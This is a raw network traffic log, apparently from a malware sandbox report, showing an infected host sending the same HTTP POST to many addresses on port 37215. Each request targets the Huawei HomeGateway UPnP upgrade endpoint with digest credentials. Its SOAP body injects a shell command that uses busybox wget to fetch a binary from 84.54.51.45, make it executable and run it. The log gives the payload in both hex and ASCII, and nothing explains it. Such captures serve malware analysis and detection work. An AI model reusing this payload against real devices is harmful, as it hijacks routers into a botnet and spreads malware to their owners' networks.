                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            553192.168.2.155353641.200.217.13937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.159038067 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            554192.168.2.153613441.84.17.24637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.159038067 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            555192.168.2.155558841.8.242.437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.159045935 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            556192.168.2.155085441.155.24.6737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.159100056 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            557192.168.2.155453641.250.179.13237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.159100056 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            558192.168.2.153514841.45.95.13537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.159116030 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            559192.168.2.155510641.104.43.1437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.159158945 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            560192.168.2.153554641.47.185.2737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.159162998 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            561192.168.2.153556041.153.124.11337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.159162998 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            562192.168.2.153567041.217.8.16137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.159200907 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
